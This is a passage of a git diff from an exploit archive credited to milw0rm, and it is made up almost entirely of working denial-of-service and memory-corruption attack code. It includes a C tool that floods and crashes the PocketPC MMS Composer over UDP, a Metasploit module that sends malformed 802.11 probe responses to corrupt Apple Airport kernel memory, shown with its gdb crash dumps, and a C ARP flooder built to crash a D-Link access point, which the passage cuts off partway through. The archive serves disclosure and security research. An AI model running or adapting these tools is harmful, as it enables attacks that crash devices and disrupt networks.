,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00}; + +int mms2_pos[] = { 40, 314, 375, 436, 489 }; + +char to[100] = {"receiver@receiver.com"}; +char from[100] = {"sender@sender.net"}; +char subject[100] = {"Your P0ckEtPC just P00PED itself!"}; + +unsigned int iteration = 0; + +void iterate(unsigned char *nty, int *pos) +{ + char tmp[57]; + char tmp2[57]; + + sprintf(tmp, "%u%u", time(NULL), iteration); + memset(&nty[pos[0]], '0', 57); + memcpy(&nty[pos[0]], tmp, (strlen(tmp) < 57) ? strlen(tmp) : 56); + + sprintf(tmp2, "http://127.0.0.1/?%s",tmp); + memset(&nty[pos[4]], '0', 57); + memcpy(&nty[pos[4]], tmp2, (strlen(tmp2) < 57) ? strlen(tmp2) : 56); +} + + +void init(unsigned char *nty, int *pos) +{ + memset(&nty[pos[1]], ' ', 56); + memcpy(&nty[pos[1]], from, (strlen(from) < 57) ? strlen(from) : 56); + memset(&nty[pos[2]], ' ', 56); + memcpy(&nty[pos[2]], to, (strlen(to) < 57) ? strlen(to) : 56); + memset(&nty[pos[3]], ' ', 56); + memcpy(&nty[pos[3]], subject, (strlen(subject) < 57) ? strlen(subject) : 56); +} + +void usage() +{ + printf(""\ + "notiflood - proof-of-concept PocketPC MMS Composer m-notification.ind flooder\n\n"\ + " (c) 2006 Collin Mulliner \n"\ + " http://www.mulliner.org/pocketpc/ | http://www.trifinite.org\n\n"\ + " for educational purposes only, please use responsible!\n\n"\ + "options:\n"\ + "\t-d destination ip (broadcast works!)\n"\ + "\t-i interval (useconds)\n"\ + "\t-n number of packets (0=unlimited)\n"\ + "\t-s subject\n"\ + "\t-f from\n"\ + "\t-t to\n"\ + "\t-c crash client\n"\ + "\t-F flip-flop between crash / start client\n"\ + "\t-h help\n"\ + "\t-q quiet\n\n"); + +} + +int main(int argc, char **argv) +{ + int f, i, l = 0; + char system_cmd[200]; + int mode = 0; // 0 = flood , 1 = crash , 2 = flip-flop + int opt; + char dest[20] = {0}; + int interval = 500000; + unsigned int num = 0; + int verbose = 1; + int flipflop = 0; + + + while ((opt = getopt(argc, argv, "i:n:d:s:t:f:cqhF")) != EOF) { + switch (opt) { + case 'd': + strncpy(dest, optarg, 19); + break; + case 's': + strncpy(subject, optarg, 56); + break; + case 't': + strncpy(to, optarg, 56); + break; + case 'f': + strncpy(from, optarg, 56); + break; + case 'c': + mode = 1; + break; + case 'F': + mode = 2; + break; + case 'n': + num = atoi(optarg); + break; + case 'i': + interval = atoi(optarg); + break; + case 'q': + verbose = 0; + break; + default: + case 'h': + usage(); + break; + } + } + + if (optind < argc) { + usage(); + exit(-1); + } + if (strlen(dest) == 0) { + usage(); + exit(-1); + } + + sprintf(system_cmd, "cat mmsflood.fld|socat udp4:%s:2948,broadcast stdin &", dest); + + init(mms1, mms1_pos); + init(mms2, mms2_pos); + + if (verbose) { + printf("to: %s\n", to); + printf("from: %s\n", from); + printf("subject: %s\n", subject); + printf("dst-ip: %s\n", dest); + if (mode == 1) printf("crash client\n"); + else if (mode == 0) printf("fillup client inbox\n"); + else printf("flip-flop mode\n"); + printf("flood interval: %d seconds\n", interval); + printf("number of packets: %d (0=unlimited)\n", num); + } + + if (mode == 2) { + flipflop = 1; + } + + do { + iteration++; + f = open("mmsflood.fld", O_CREAT|O_RDWR|O_TRUNC, 00666); + if (mode == 0) { // flood + iterate(mms1, mms1_pos); + write(f, mms1, sizeof(mms1)); + } + else if (mode == 1) { // crash + iterate(mms2, mms2_pos); + write(f, mms2, sizeof(mms2)); + } + close(f); + system(system_cmd); + if (flipflop == 1) { + if (mode == 0) mode = 1; + else mode = 0; + } + if (interval > 0) usleep(interval); + } while ((iteration < num && num != 0) || num == 0); + + return(0); +} + +// milw0rm.com [2006-08-09] diff --git a/platforms/hardware/dos/2176.html b/platforms/hardware/dos/2176.html index 66e687072..a2938c988 100755 --- a/platforms/hardware/dos/2176.html +++ b/platforms/hardware/dos/2176.html @@ -1,37 +1,37 @@ - - - - -Nokia Browser Crash by Qode
- - - - - -# milw0rm.com [2006-08-13] + + + + +Nokia Browser Crash by Qode
+ + + + + +# milw0rm.com [2006-08-13] diff --git a/platforms/hardware/dos/262.pl b/platforms/hardware/dos/262.pl index 4a7c74c1b..5bc4e9982 100755 --- a/platforms/hardware/dos/262.pl +++ b/platforms/hardware/dos/262.pl @@ -85,6 +85,6 @@ sub exploit if ($menu_opt == 3){while (<$SOCKET>){print}} close($SOCKET); } - - -# milw0rm.com [2001-01-27] + + +# milw0rm.com [2001-01-27] diff --git a/platforms/hardware/dos/2700.rb b/platforms/hardware/dos/2700.rb index 9154c3d06..2eaedf938 100755 --- a/platforms/hardware/dos/2700.rb +++ b/platforms/hardware/dos/2700.rb @@ -1,165 +1,165 @@ -# A proof-of-concept exploit has been added to the Metasploit Framework 3.0 source tree: -# msf > use auxiliary/dos/wireless/daringphucball - -require 'msf/core' - -module Msf - -class Auxiliary::Dos::Wireless::DaringPhucball < Msf::Auxiliary - - include Exploit::Lorcon - - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Apple Airport 802.11 Probe Response Kernel Memory Corruption', - 'Description' => %q{ - The Apple Airport driver provided with Orinoco-based Airport cards (1999-2003 PowerBooks, iMacs) - is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning - mode, a malformed probe response frame can be used to corrupt internal kernel structures, leading - to arbitrary code execution. This vulnerability is triggered when a probe response frame is received - that does not contain valid information element (IE) fields after the fixed-length header. The data - following the fixed-length header is copied over internal kernel structures, resulting in memory - operations being performed on attacker-controlled pointer values. - }, - - 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 3666 $' - )) - register_options( - [ - OptInt.new('COUNT', [ true, "The number of frames to send", 2000]), - OptString.new('ADDR_DST', [ true, "The MAC address of the target system"]) - ], self.class) - end - - # - # This bug is easiest to trigger when the card has been placed into active scan mode: - # $ /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s -r 10000 - # - - def run - open_wifi - - cnt = datastore['COUNT'].to_i - - print_status("Creating malicious probe response frame...") - frame = create_frame() - - print_status("Sending #{cnt} frames...") - 0.upto(cnt) { |i| wifi.write(frame) } - end - - def eton(addr) - addr.split(':').map { |c| c.hex.chr }.join - end - - def create_frame - bssid = Rex::Text.rand_text(6) - seq = [rand(255)].pack('n') - caps = [rand(65535)].pack('n') - - frame = - "\x50" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - eton(datastore['ADDR_DST']) + # dst - bssid + # src - bssid + # bssid - seq + # seq - Rex::Text.rand_text(8) + # timestamp value - Rex::Text.rand_text(2) + # beacon interval - Rex::Text.rand_text(2) # capabilities - - frame << [0x0defaced].pack('N') * ((1024-frame.length) / 4) - - return frame - - end -end -end - -=begin - -Tested on a 1.0Ghz PowerBook running 10.4.8 with the latest updates (Halloween, 2006) - -Unresolved kernel trap(cpu 0): 0x300 - Data access DAR=0x000000000DEFACF7 PC=0x00000000007A2260 -Latest crash info for cpu 0: - Exception state (sv=0x3AA12A00) - PC=0x007A2260; MSR=0x00009030; DAR=0x0DEFACF7; DSISR=0x40000000; LR=0x007A1D48; R1=0x17443B60; XCP=0x0000000C (0x300 - Data access) - Backtrace: -0x01BC80AC 0x007A1D48 0x0079FA54 0x0079FF94 0x0079FEBC 0x002D0B94 - 0x002CFA5C 0x000A9314 - Kernel loadable modules in backtrace (with dependencies): - com.apple.driver.AppleAirPort(3.4.4)@0x797000 - dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x5f8000 -Proceeding back via exception chain: - Exception state (sv=0x3AA12A00) - previously dumped as "Latest" state. skipping... - Exception state (sv=0x31F13A00) - PC=0x00000000; MSR=0x0000D030; DAR=0x00000000; DSISR=0x00000000; LR=0x00000000; R1=0x00000000; XCP=0x00000000 (Unknown) - -Kernel version: -Darwin Kernel Version 8.8.0: Fri Sep 8 17:18:57 PDT 2006; root:xnu-792.12.6.obj~1/RELEASE_PPC - - - -(gdb) showcurrentstacks -task vm_map ipc_space #acts pid proc command -0x01a73dd8 0x00cdaf3c 0x01a68ef0 38 0 0x003fb200 kernel_task - activation thread pri state wait_queue wait_event - 0x01a7c000 0x01a7c000 82 R - reserved_stack=0x173b0000 - kernel_stack=0x17440000 - stacktop=0x17443b60 - 0x17443b60 0x1bc80ac - 0x17443be0 0x7a1d48 - 0x17443c60 0x79fa54 - 0x17443ce0 0x79ff94 - 0x17443d90 0x79febc - 0x17443df0 0x2d0b94 <_ZN22IOInterruptEventSource12checkForWorkEv+184> - 0x17443e40 0x2cfa5c <_ZN10IOWorkLoop10threadMainEv+104> - 0x17443e90 0xa9314 - stackbottom=0x17443e90 - - -(gdb) x/3i $pc -0x7a2260 : lbz r8,0(r2) -0x7a2264 : addi r2,r2,1 -0x7a2268 : stw r2,0(r11) - -(gdb) i r $r2 -r2 0xdefacf7 233811191 - -(gdb) x/x $r11 -0x17443bb8: 0x0defacf7 - - -(gdb) bt -#0 0x007a2260 in mhp.1762 () -#1 0x007a1d48 in mhp.1762 () -warning: Previous frame identical to this frame (corrupt stack?) -#2 0x007a1d48 in mhp.1762 () -#3 0x0079fa54 in mhp.1762 () -#4 0x0079ff94 in mhp.1762 () -#5 0x0079febc in mhp.1762 () -#6 0x002d0b94 in IOInterruptEventSource::checkForWork (this=0x1d80d40) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOInterruptEventSource.cpp:196 -#7 0x002cfa5c in IOWorkLoop::threadMain (this=0x1d803c0) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOWorkLoop.cpp:267 - - -(gdb) x/40x $r1 -0x17443b60: 0x17443be0 0x22424022 0x01bc80ac 0x00000038 -0x17443b70: 0x00d43c54 0x0004ffff 0x01bc81f4 0x00000210 -0x17443b80: 0x02275000 0x003d8000 0x004fa418 0x00365000 -0x17443b90: 0x01d803c0 0x00033e88 0x01a7c01c 0x01a7c0a4 -0x17443ba0: 0x0defaced 0x01bc8000 0x0227581e 0x0defacf7 -0x17443bb0: 0x00000000 0x0227581e 0x0defacf7 0x00000001 -0x17443bc0: 0x00000002 0x01bc81f4 0x00000000 0x00000000 -0x17443bd0: 0x17443c10 0x01a858c0 0x17443be0 0x01d80d40 -0x17443be0: 0x17443c60 0x01bc81f4 0x007a1d48 0x00000000 -0x17443bf0: 0x17443c20 0x00008088 0x01bc8000 0x0227581e - -=end - -# milw0rm.com [2006-11-01] +# A proof-of-concept exploit has been added to the Metasploit Framework 3.0 source tree: +# msf > use auxiliary/dos/wireless/daringphucball + +require 'msf/core' + +module Msf + +class Auxiliary::Dos::Wireless::DaringPhucball < Msf::Auxiliary + + include Exploit::Lorcon + + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Apple Airport 802.11 Probe Response Kernel Memory Corruption', + 'Description' => %q{ + The Apple Airport driver provided with Orinoco-based Airport cards (1999-2003 PowerBooks, iMacs) + is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning + mode, a malformed probe response frame can be used to corrupt internal kernel structures, leading + to arbitrary code execution. This vulnerability is triggered when a probe response frame is received + that does not contain valid information element (IE) fields after the fixed-length header. The data + following the fixed-length header is copied over internal kernel structures, resulting in memory + operations being performed on attacker-controlled pointer values. + }, + + 'Author' => [ 'hdm' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 3666 $' + )) + register_options( + [ + OptInt.new('COUNT', [ true, "The number of frames to send", 2000]), + OptString.new('ADDR_DST', [ true, "The MAC address of the target system"]) + ], self.class) + end + + # + # This bug is easiest to trigger when the card has been placed into active scan mode: + # $ /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s -r 10000 + # + + def run + open_wifi + + cnt = datastore['COUNT'].to_i + + print_status("Creating malicious probe response frame...") + frame = create_frame() + + print_status("Sending #{cnt} frames...") + 0.upto(cnt) { |i| wifi.write(frame) } + end + + def eton(addr) + addr.split(':').map { |c| c.hex.chr }.join + end + + def create_frame + bssid = Rex::Text.rand_text(6) + seq = [rand(255)].pack('n') + caps = [rand(65535)].pack('n') + + frame = + "\x50" + # type/subtype + "\x00" + # flags + "\x00\x00" + # duration + eton(datastore['ADDR_DST']) + # dst + bssid + # src + bssid + # bssid + seq + # seq + Rex::Text.rand_text(8) + # timestamp value + Rex::Text.rand_text(2) + # beacon interval + Rex::Text.rand_text(2) # capabilities + + frame << [0x0defaced].pack('N') * ((1024-frame.length) / 4) + + return frame + + end +end +end + +=begin + +Tested on a 1.0Ghz PowerBook running 10.4.8 with the latest updates (Halloween, 2006) + +Unresolved kernel trap(cpu 0): 0x300 - Data access DAR=0x000000000DEFACF7 PC=0x00000000007A2260 +Latest crash info for cpu 0: + Exception state (sv=0x3AA12A00) + PC=0x007A2260; MSR=0x00009030; DAR=0x0DEFACF7; DSISR=0x40000000; LR=0x007A1D48; R1=0x17443B60; XCP=0x0000000C (0x300 - Data access) + Backtrace: +0x01BC80AC 0x007A1D48 0x0079FA54 0x0079FF94 0x0079FEBC 0x002D0B94 + 0x002CFA5C 0x000A9314 + Kernel loadable modules in backtrace (with dependencies): + com.apple.driver.AppleAirPort(3.4.4)@0x797000 + dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x5f8000 +Proceeding back via exception chain: + Exception state (sv=0x3AA12A00) + previously dumped as "Latest" state. skipping... + Exception state (sv=0x31F13A00) + PC=0x00000000; MSR=0x0000D030; DAR=0x00000000; DSISR=0x00000000; LR=0x00000000; R1=0x00000000; XCP=0x00000000 (Unknown) + +Kernel version: +Darwin Kernel Version 8.8.0: Fri Sep 8 17:18:57 PDT 2006; root:xnu-792.12.6.obj~1/RELEASE_PPC + + + +(gdb) showcurrentstacks +task vm_map ipc_space #acts pid proc command +0x01a73dd8 0x00cdaf3c 0x01a68ef0 38 0 0x003fb200 kernel_task + activation thread pri state wait_queue wait_event + 0x01a7c000 0x01a7c000 82 R + reserved_stack=0x173b0000 + kernel_stack=0x17440000 + stacktop=0x17443b60 + 0x17443b60 0x1bc80ac + 0x17443be0 0x7a1d48 + 0x17443c60 0x79fa54 + 0x17443ce0 0x79ff94 + 0x17443d90 0x79febc + 0x17443df0 0x2d0b94 <_ZN22IOInterruptEventSource12checkForWorkEv+184> + 0x17443e40 0x2cfa5c <_ZN10IOWorkLoop10threadMainEv+104> + 0x17443e90 0xa9314 + stackbottom=0x17443e90 + + +(gdb) x/3i $pc +0x7a2260 : lbz r8,0(r2) +0x7a2264 : addi r2,r2,1 +0x7a2268 : stw r2,0(r11) + +(gdb) i r $r2 +r2 0xdefacf7 233811191 + +(gdb) x/x $r11 +0x17443bb8: 0x0defacf7 + + +(gdb) bt +#0 0x007a2260 in mhp.1762 () +#1 0x007a1d48 in mhp.1762 () +warning: Previous frame identical to this frame (corrupt stack?) +#2 0x007a1d48 in mhp.1762 () +#3 0x0079fa54 in mhp.1762 () +#4 0x0079ff94 in mhp.1762 () +#5 0x0079febc in mhp.1762 () +#6 0x002d0b94 in IOInterruptEventSource::checkForWork (this=0x1d80d40) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOInterruptEventSource.cpp:196 +#7 0x002cfa5c in IOWorkLoop::threadMain (this=0x1d803c0) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOWorkLoop.cpp:267 + + +(gdb) x/40x $r1 +0x17443b60: 0x17443be0 0x22424022 0x01bc80ac 0x00000038 +0x17443b70: 0x00d43c54 0x0004ffff 0x01bc81f4 0x00000210 +0x17443b80: 0x02275000 0x003d8000 0x004fa418 0x00365000 +0x17443b90: 0x01d803c0 0x00033e88 0x01a7c01c 0x01a7c0a4 +0x17443ba0: 0x0defaced 0x01bc8000 0x0227581e 0x0defacf7 +0x17443bb0: 0x00000000 0x0227581e 0x0defacf7 0x00000001 +0x17443bc0: 0x00000002 0x01bc81f4 0x00000000 0x00000000 +0x17443bd0: 0x17443c10 0x01a858c0 0x17443be0 0x01d80d40 +0x17443be0: 0x17443c60 0x01bc81f4 0x007a1d48 0x00000000 +0x17443bf0: 0x17443c20 0x00008088 0x01bc8000 0x0227581e + +=end + +# milw0rm.com [2006-11-01] diff --git a/platforms/hardware/dos/2915.c b/platforms/hardware/dos/2915.c index 341d1f4f5..5c6dbbb26 100755 --- a/platforms/hardware/dos/2915.c +++ b/platforms/hardware/dos/2915.c @@ -1,748 +1,748 @@ -/* - -ARP FLOODER v0.1 - poplix@papuasia.org - 2006-12-04 -designed to crash D-LINK DWL-2000AP+ - -compile with: gcc arpflood.c -o arpflood - - -*/ - - - -#define _BSD_SOURCE 1 -#define _GNU_SOURCE - -#include -#include -#include -#include -#include -#include - - -#include -#include //param.h defines BSD in bsd systems -#include -#include -#include - -#include -#include -#include - -#ifdef BSD -#include - #include -#endif - - -#include -#include -#include -#include -#include - - - -#ifdef BSD -#include -#include -#endif - - -#ifdef __linux__ -#include -#include -#endif - -#ifndef DLT_EN10MB -#define DLT_EN10MB 1 -#endif - -#ifndef DLT_LOOP -#define DLT_LOOP 10 -#endif - -#ifndef DLT_PPP -#define DLT_PPP 9 -#endif - -#define ETHADDR_SIZE 6 -#define ETHHDR_SIZE 14 -#define ETHTYPE_IP 0x0800 -#define ETHERTYPE_ARP 0x0806 - - - - - -#define SMALLOC(x,y){x=(y*)malloc(sizeof(y));\ - if( x == NULL){printf("malloc out of memory");\ - exit(9);}\ - } - - - -#define CALLOC(x,y,z){ x=(y*)calloc(z,sizeof(y));if(x==NULL){\ - printf("calloc out of memory\n");\ - exit(9);}} - -#define SSTRNCPY(dst,src,len){strncpy(dst,src,len-1); dst[len-1]=0;} -#define SSTRNCAT(dst,src,len)strncat(dst,src, len - strlen(dst) - 1); - - - - - -#define ETHARP_PKT_SIZE 42 // eth + arpfixedsize + addresses size - - -#define FTYPE_REQ 1 -#define FTYPE_REPLY 2 - - - - -struct intf{ - char name[12]; - u_int index; - int fd; - u_int mtu; - u_int type; - - u_int32_t ipaddr; - u_int32_t netmask; - - u_char l2addr[6]; - u_int l2addr_size; - u_int l2hdr_size; - -}; - - - - -struct intf out_intf; - - - - -u_int ip_to_int(char *ip, int *err){ - char *inv,*s; - u_char ret[4]; - int a; - u_int tmp; - - if(ip == NULL || strlen(ip) < 7) return 0; - s=ip; - for( a=0; a < 4; a++){ - tmp=strtoul(s,&inv,10); - if( (*inv != '.' && *inv!=0) || tmp < 0 || tmp > 255 ) { - if(err != NULL)*err=1; - return 0; - } - ret[a]=tmp; - s=++inv; - } - - if(err != NULL)*err=0; - return *((u_int*)ret); - -} - - -int str_to_macaddr(char *str, u_char *dst){ - char *inv,*s; - int a; - u_int tmp; - - if(str == NULL || strlen(str) < 11) return 0; - s=str; - for( a=0; a < 6; a++){ - tmp=strtoul(s,&inv,16); - if( (*inv != ':' && *inv!=0) || tmp < 0x00 || tmp > 0xff ) - return 0; - - dst[a]=tmp; - s=++inv; - } - - - return 1; - -} - - - -char *int_to_ip(u_int32_t ip){ - u_char *tmp=(u_char *)&ip; - static char ret[16]; - memset(ret,0,sizeof(ret)); - sprintf(ret,"%u.%u.%u.%u",tmp[0] & 0xff,tmp[1] & 0xff,tmp[2] & 0xff,tmp[3] & 0xff); - return ret; - -} - - -char *macaddr_to_str(u_char *mac){ - static char ret[18]; - memset(ret,0,sizeof(ret)); - sprintf(ret,"%02x:%02x:%02x:%02x:%02x:%02x",mac[0],mac[1],mac[2],mac[3],mac[4],mac[5]); - return ret; - -} - - - - - - - - -int build_ether_hdr(u_char *dst, u_char* src,u_short type,u_char* dstbuff){ - memcpy(dstbuff,dst,ETHADDR_SIZE); - memcpy(dstbuff+6,src,ETHADDR_SIZE); - - *( (u_short*)(dstbuff+12) ) = htons(type); - - return 1; - -} - - - - -int build_arp_hdr(u_char *hdst,u_int32_t pdst,u_char* hsrc,u_int32_t psrc,u_short arpop,u_char* dstbuff){ - struct arphdr* hdr= (struct arphdr*)dstbuff; - u_int off; - - hdr->ar_hrd=htons(ARPHRD_ETHER); - hdr->ar_pro=htons(ETHTYPE_IP); - hdr->ar_hln=ETHADDR_SIZE; - hdr->ar_pln=4; - hdr->ar_op=htons(arpop); - - off=8; - - memcpy(dstbuff + off,hsrc,ETHADDR_SIZE); - off+=ETHADDR_SIZE; - - memcpy(dstbuff + off,(u_char*)&psrc,4); - off+=4, - - memcpy(dstbuff + off,hdst,ETHADDR_SIZE); - off+=ETHADDR_SIZE; - - memcpy(dstbuff + off,(u_char*)&pdst,4); - - return 1; -} - - - -int arp_request(u_int32_t ripaddr,u_int32_t ipsrc,u_char *macsrc){ - u_char arpbuff[ETHARP_PKT_SIZE]; - - if(macsrc==NULL)macsrc=out_intf.l2addr; - if(ipsrc==0)ipsrc=out_intf.ipaddr; - build_ether_hdr((u_char*)"\xff\xff\xff\xff\xff\xff",macsrc,ETHERTYPE_ARP,arpbuff); - - build_arp_hdr((u_char*)"\x0\x0\x0\x0\x0\x0", - ripaddr, - macsrc, - ipsrc, - ARPOP_REQUEST, - arpbuff + ETHHDR_SIZE - ); - - write_link(&out_intf,arpbuff,sizeof(arpbuff)); - - return 1; -} - - - - -int arp_reply(u_int32_t ipdst,u_char *dstmac,u_int32_t ipsrc,u_char *srcmac){ - u_char arpbuff[ETHHDR_SIZE + ETHARP_PKT_SIZE]; - - if(srcmac==NULL)srcmac=out_intf.l2addr; - - build_ether_hdr(dstmac, srcmac, ETHERTYPE_ARP, arpbuff); - build_arp_hdr(dstmac, ipdst, srcmac, ipsrc, ARPOP_REPLY, arpbuff+ETHHDR_SIZE); - write_link(&out_intf,arpbuff,sizeof(arpbuff)); - - return 1; -} - - - - -#ifdef BSD - -int getifinfo(char *name,struct intf *iface){ - struct ifaddrs *ifap, *ifa; - int find=0; - - int mib[]={CTL_NET,AF_ROUTE,0,AF_LINK,NET_RT_IFLIST,0}; - size_t len; - u_char *buff, *next, *end; - struct if_msghdr *ifm; - struct sockaddr_dl *sdl; - - - // get the list - if(getifaddrs(&ifap) < 0) return 0; - - if(!ifap) return 0; - //nota che ogni inf compare due volte in lista, una volta come AF_LINK e una AF_INET - for(ifa = ifap; ifa; ifa = ifa->ifa_next) - if(!strcmp(name,ifa->ifa_name)){ - //copy only the first time - if(find==0){ - memset(iface->name,0,sizeof(iface->name)); - SSTRNCPY(iface->name,name,sizeof(iface->name)); - } - find=1; - if(ifa->ifa_addr->sa_family == AF_LINK){ - iface->mtu=((struct if_data*)ifa->ifa_data)->ifi_mtu; - - switch(((struct if_data*)ifa->ifa_data)->ifi_type){ - case IFT_ETHER: - iface->type=DLT_EN10MB; - iface->l2hdr_size=ETHHDR_SIZE; - break; - case IFT_GIF: - case IFT_LOOP: - iface->type=DLT_LOOP; - iface->l2hdr_size=0; - break; - case IFT_PPP: - iface->type = DLT_PPP; - default: - freeifaddrs(ifap); - return 0; - } - - } - if(ifa->ifa_addr->sa_family == AF_INET){ - iface->ipaddr = (u_int32_t) ((struct sockaddr_in*)ifa->ifa_addr)->sin_addr.s_addr; - iface->netmask = (u_int32_t) ((struct sockaddr_in*)ifa->ifa_netmask)->sin_addr.s_addr; - } - } - - freeifaddrs(ifap); - - //get hardware address - if (sysctl(mib, ETHADDR_SIZE, NULL, &len, NULL, 0) == -1){ - printf("getting hardware address\n"); - exit(1); - } - - CALLOC(buff,u_char,len); - if (sysctl(mib, ETHADDR_SIZE, buff, &len, NULL, 0) < 0){ - free(buff); - printf("getting hardware address\n"); - exit(1); - } - end = buff + len; - - for (next = buff ; next < end ; next += ifm->ifm_msglen){ - ifm = (struct if_msghdr *)next; - if (ifm->ifm_type == RTM_IFINFO){ - sdl = (struct sockaddr_dl *)(ifm + 1); - if (strncmp(&sdl->sdl_data[0], iface->name, sdl->sdl_nlen) == 0){ - memcpy(iface->l2addr,LLADDR(sdl),ETHADDR_SIZE); - break; - } - } - } - free(buff); - - iface->index=0; // dont care - - return find; - - - } - - -//int wrink(u_int fd,u_char *frame, u_int size){ -int write_link(struct intf *iface,u_char *frame, u_int size){ - int c; - - if (iface->fd < 0){ - printf("%s\n","bpf error"); - exit(2); - } - c = write(iface->fd, frame, size); - - if (c != size){ - printf("error writing to bpf,, written:%d bytes\n",c); - exit(3); - } - - return (c); -} - - -int open_link(char* ifname){ - int i, fd; - char devname[12]; - struct ifreq ifr; - - for (i=0; i<100; i++){ - sprintf(devname, "/dev/bpf%u", i); - fd = open(devname, O_RDWR); - if (fd == -1 && errno == EBUSY) - continue; - else - break; - } - - if (fd == -1){ - printf("unable to open bpf\n"); - exit(4); - } - - - SSTRNCPY(ifr.ifr_name, ifname, sizeof(ifr.ifr_name)); - - if (ioctl(fd, BIOCSETIF, (caddr_t)&ifr) == -1){ - printf("attaching interface to bpf\n"); - exit(4); - } - - - return (fd); -} - - -#endif -//end of BSD code - - - -#ifdef __linux__ - //fetifinfo sets:ifname, mtu, link-type,layer4 address,layer4 netmask, - -int getifinfo(char *name,struct intf *iface){ - int fd,find=0; - struct ifconf ifc; - struct ifreq ibuf[16], ifr, *ifrp, *ifend; - struct sockaddr_in sa; - - - - - if ( (fd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) return 0; - - memset(ibuf, 0, sizeof(struct ifreq)*16); - ifc.ifc_len = sizeof(ibuf); - ifc.ifc_buf = (caddr_t) ibuf; - - /* gets interfaces list */ - if ( ioctl(fd, SIOCGIFCONF, (char*)&ifc) == -1 || - ifc.ifc_len < sizeof(struct ifreq) ) - goto bad; - - /* ifrp points to buffer and ifend points to buffer's end */ - ifrp = ibuf; - ifend = (struct ifreq*) ((char*)ibuf + ifc.ifc_len); - - for (; ifrp < ifend; ifrp++) { - if(strcmp(ifrp->ifr_name,name))continue; - find=1; - SSTRNCPY(ifr.ifr_name, ifrp->ifr_name, sizeof(ifr.ifr_name)); - - //get if flags - if(ioctl(fd, SIOCGIFFLAGS, (char*)&ifr) == -1) - goto bad; - - //if is down - if ( !(ifr.ifr_flags & IFF_UP) )goto bad; - - SSTRNCPY(iface->name, ifr.ifr_name, sizeof(iface->name)); - - //get l3 addr - if (ioctl(fd, SIOCGIFADDR, (char*)&ifr) == -1)goto bad; - - if (ifr.ifr_ifru.ifru_addr.sa_family == AF_INET) { - //save addr - iface->ipaddr=((struct sockaddr_in 